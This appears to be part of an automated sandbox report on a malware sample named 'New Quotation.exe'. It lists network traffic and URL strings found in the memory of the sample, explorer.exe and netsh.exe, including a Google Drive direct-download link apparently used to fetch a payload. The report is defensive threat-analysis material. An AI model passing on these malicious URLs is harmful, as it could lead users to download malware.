      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
      Source: netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
      Source: netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
      Source: New Quotation.exe, 00000007.00000003.49327272532.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49331881639.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49636406338.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49336268116.0000000001960000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49614489090.0000000001963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: New Quotation.exe, 00000007.00000003.49327272532.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49331881639.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49636406338.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49336268116.0000000001960000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49614489090.0000000001963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: explorer.exe, 0000000A.00000000.49581706550.0000000009749000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49428253947.0000000010A0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49461279840.0000000009749000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49376323166.0000000010A0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49358115097.0000000009749000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49484180225.0000000010A0C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
      Source: New Quotation.exe, 00000007.00000001.49189635366.0000000000649000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b8%95%e0%b8%b4%e0%b8%94%e0%b8%95%e0%b9%88%e0%b
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/category/%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-content/themes/advance-portfolio/css/bootstrap.css?ver=5.1.13
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-content/themes/advance-portfolio/css/custom.css?ver=5.1.13
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-content/themes/advance-portfolio/css/fontawesome-all.css?ver=5.1.13
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-content/themes/advance-portfolio/css/ie.css?ver=5.1.13
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-content/themes/advance-portfolio/js/SmoothScroll.js?ver=5.1.13
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-content/themes/advance-portfolio/js/bootstrap.js?ver=5.1.13
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-content/themes/advance-portfolio/js/custom.js?ver=5.1.13
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-content/themes/advance-portfolio/style.css?ver=5.1.13
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-content/uploads/2019/02/1694284689_cb68647c-011d-4340-a998-8a154d3b42dc.pn
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.13
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-includes/js/jquery/jquery.js?ver=1.12.4
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-includes/js/wp-embed.min.js?ver=5.1.13
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-includes/wlwmanifest.xml
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/wp-json/
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lcm-brokers.com/xmlrpc.php?rsd
      Source: New Quotation.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: explorer.exe, 0000000A.00000000.49461694655.000000000978E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49582145902.000000000978E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49358395775.000000000978E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/
      Source: explorer.exe, 0000000A.00000000.49461694655.000000000978E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49582145902.000000000978E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49358395775.000000000978E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/G
      Source: explorer.exe, 0000000A.00000000.49581706550.0000000009749000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49428253947.0000000010A0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49461279840.0000000009749000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49376323166.0000000010A0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49358115097.0000000009749000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49484180225.0000000010A0C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
      Source: explorer.exe, 0000000A.00000000.49427367248.0000000010957000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49482863595.0000000010957000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49375457451.0000000010957000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
      Source: explorer.exe, 0000000A.00000000.49376266673.0000000010A02000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49428253947.0000000010A0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49376323166.0000000010A0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49428195778.0000000010A02000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49484180225.0000000010A0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49484073557.0000000010A02000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
      Source: netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
      Source: netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
      Source: netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
      Source: explorer.exe, 0000000A.00000000.49585608138.000000000A7F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.49449817529.0000000003000000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.49463206909.0000000009C50000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 0000000A.00000000.49459497536.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49579842932.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49356288343.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49407255010.00000000095B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.microso
      Source: netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exeString found in binary or memory: http://subca.ocsp-certum.com01
      Source: netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exeString found in binary or memory: http://subca.ocsp-certum.com02
      Source: netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exeString found in binary or memory: http://subca.ocsp-certum.com05
      Source: netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exeString found in binary or memory: http://www.certum.pl/CPS0
      Source: explorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
      Source: New Quotation.exe, 00000007.00000001.49189635366.0000000000649000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
      Source: New Quotation.exe, 00000007.00000001.49189403103.0000000000626000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
      Source: New Quotation.exe, 00000007.00000001.49189110722.00000000005F2000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: New Quotation.exe, 00000007.00000001.49189110722.00000000005F2000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: explorer.exe, 0000000A.00000000.49427367248.0000000010957000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49482863595.0000000010957000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49375457451.0000000010957000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp$
      Source: explorer.exe, 0000000A.00000000.49459497536.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49579842932.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49356288343.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49407255010.00000000095B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
      Source: explorer.exe, 0000000A.00000000.49477427067.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49597081612.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49423431400.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 0000000A.00000000.49477427067.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49597081612.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49423431400.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS/
      Source: explorer.exe, 0000000A.00000000.49477427067.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49597081612.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49423431400.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSP
      Source: explorer.exe, 0000000A.00000000.49477427067.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49597081612.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49423431400.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSop
      Source: explorer.exe, 0000000A.00000000.49427367248.0000000010957000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49482863595.0000000010957000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49375457451.0000000010957000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 0000000A.00000000.49427872875.00000000109BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49375935826.00000000109BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49483566906.00000000109BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 0000000A.00000000.49355474734.0000000009508000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49578967712.0000000009508000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49406430293.0000000009508000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49458681823.0000000009508000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?Q3
      Source: explorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
      Source: explorer.exe, 0000000A.00000000.49469621943.000000000CC76000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49416561413.000000000CC76000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49365098957.000000000CC76000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49590263815.000000000CC76000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
      Source: explorer.exe, 0000000A.00000000.49415949840.000000000CC03000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49364236912.000000000CC03000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49589628273.000000000CC03000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49468962508.000000000CC03000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
      Source: explorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
      Source: New Quotation.exe, 00000007.00000003.49331881639.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49636406338.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49336268116.0000000001960000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49614489090.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49635811481.0000000001928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-14-as-docs.googleusercontent.com/
      Source: New Quotation.exe, 00000007.00000002.49635811481.0000000001928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-14-as-docs.googleusercontent.com/(i
      Source: New Quotation.exe, 00000007.00000003.49331881639.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49636406338.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49336268116.0000000001960000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49614489090.0000000001963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-14-as-docs.googleusercontent.com/T
      Source: New Quotation.exe, 00000007.00000002.49636132043.0000000001947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-14-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/do4pmedi
      Source: New Quotation.exe, 00000007.00000002.49635663591.0000000001911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: New Quotation.exe, 00000007.00000002.49635663591.0000000001911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/tL
      Source: New Quotation.exe, 00000007.00000002.49635411113.00000000018E8000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49635811481.0000000001928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1pkJqJeYBgsKa6ou6xByI4DdGT3NGirLb
      Source: New Quotation.exe, 00000007.00000002.49635411113.00000000018E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1pkJqJeYBgsKa6ou6xByI4DdGT3NGirLbB
      Source: New Quotation.exe, 00000007.00000002.49635811481.0000000001928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1pkJqJeYBgsKa6ou6xByI4DdGT3NGirLbVZ
      Source: explorer.exe, 0000000A.00000000.49477427067.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49597081612.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49423431400.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comf_l=
      Source: New Quotation.exe, 00000007.00000001.49189635366.0000000000649000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: explorer.exe, 0000000A.00000000.49477427067.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49597081612.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49423431400.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.combwe
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.bodiscdn.com
      Source: explorer.exe, 0000000A.00000000.49459497536.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49579842932.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49356288343.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49407255010.00000000095B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEM
      Source: explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/shellRESP
      Source: explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/shell
      Source: explorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell
      Source: explorer.exe, 0000000A.00000000.49446749601.0000000000B61000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49393153802.0000000000B61000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49565465605.0000000000B61000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49345620322.0000000000B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/D
      Source: explorer.exe, 0000000A.00000000.49477427067.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49597081612.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49423431400.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comTo
      Source: explorer.exe, 0000000A.00000000.49348394028.0000000003101000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49427367248.0000000010957000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49428253947.0000000010A0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49482863595.0000000010957000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49376323166.0000000010A0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49484180225.0000000010A0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49375457451.0000000010957000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: explorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
